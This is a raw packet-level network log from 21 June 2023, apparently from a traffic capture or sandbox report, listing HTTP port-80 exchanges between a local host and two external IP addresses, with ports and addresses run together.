                                                                                                  Jun 21, 2023 20:24:04.322917938 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.322951078 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.322999954 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323012114 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.323041916 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.323092937 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323270082 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323316097 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323338032 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.323362112 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323405981 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323432922 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.323451042 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323477030 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.323498011 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323543072 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323564053 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.323592901 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323653936 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.323659897 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323777914 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323848009 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323899031 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.323919058 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.323991060 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324040890 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324060917 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.324089050 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324107885 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.324137926 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324188948 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324222088 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324254036 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324309111 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.324342966 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324418068 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324464083 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324485064 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.324510098 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324558020 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324573040 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.324606895 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324623108 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.324655056 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324708939 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324718952 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.324778080 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324846029 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324852943 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.324913025 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.324975967 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325025082 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325038910 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.325073004 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325119972 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325133085 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.325166941 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325177908 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.325216055 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325262070 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325285912 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.325309992 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325357914 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325377941 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.325407028 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325495958 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325544119 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325568914 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.325593948 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325640917 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325673103 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325706959 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325738907 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325779915 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.325787067 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325856924 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.325894117 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.325964928 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326031923 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326034069 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326086044 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326133013 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326159954 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326179981 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326229095 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326275110 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326293945 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326323986 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326370001 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326390982 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326416969 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326436043 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326462984 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326508999 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326529980 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326556921 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326603889 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326630116 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326653957 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326700926 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326747894 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326761961 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326793909 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326842070 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.326858044 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326910973 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.326951027 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327023983 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327091932 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327127934 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.327159882 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327214003 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327306032 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327311039 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.327374935 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.327380896 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327430964 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327478886 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327496052 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.327527046 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327575922 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327591896 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.327625990 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327672958 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327719927 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327737093 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.327769995 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327819109 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327840090 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.327868938 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327884912 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.327917099 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327967882 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.327980995 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.328022957 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328092098 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.328092098 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328197002 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328286886 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328351021 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328366041 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.328397989 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328489065 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328489065 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.328536034 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328558922 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.328588009 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328656912 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.328663111 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328793049 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328856945 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328860998 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.328922987 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.328969955 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329015017 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329037905 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329060078 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329114914 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329121113 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329178095 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329184055 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329246044 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329277992 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329304934 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329327106 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329346895 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329349995 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329380035 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329380035 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329404116 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329426050 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329447031 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329447985 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329468966 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329477072 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329492092 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329504013 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329516888 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329540014 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329554081 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329562902 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329586983 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329610109 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329632044 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329643965 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329643965 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329655886 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329679966 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329698086 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329700947 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329745054 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329749107 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329776049 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329812050 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329834938 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329843044 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329865932 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329869986 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329890966 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329912901 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329931021 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.329941034 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329957008 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.329978943 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330001116 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330005884 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.330024004 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330034971 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.330046892 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330070972 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330082893 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.330094099 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330116987 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330137968 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330144882 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.330163002 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330173969 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.330187082 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330199957 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.330209017 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.330277920 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.461695910 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.461759090 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.461807966 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.461817026 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.461853981 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.461867094 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.461910963 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462021112 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462105989 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462110043 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462169886 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462274075 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462320089 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462351084 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462373972 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462382078 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462445021 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462554932 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462601900 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462621927 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462651014 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462666988 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462699890 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462707043 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462748051 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.462774992 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.462812901 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.749491930 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749560118 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749608994 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749656916 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749706984 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749727964 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.749727964 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.749753952 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749803066 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749809027 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.749850988 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749855995 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.749901056 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.749958038 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750060081 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750108957 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750158072 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750170946 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750205994 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750256062 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750267029 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750305891 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750308990 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750356913 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750406981 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750430107 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750457048 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750504971 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750521898 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750554085 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750566006 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750603914 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750657082 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750660896 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750706911 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750755072 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750761032 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750804901 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750809908 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.750854015 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750902891 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.750905991 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.751831055 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:04.767764091 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.768940926 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:04.784888029 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.785845041 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.844772100 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.844799042 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:04.844903946 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:05.037214994 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:05.037276983 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:05.037314892 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:05.037333012 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:05.037362099 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:05.037395954 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:05.037419081 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:05.037471056 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:05.037473917 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:05.037520885 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:05.037527084 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:05.037568092 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:05.037574053 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:05.037616014 CEST8049712186.182.55.44192.168.2.4
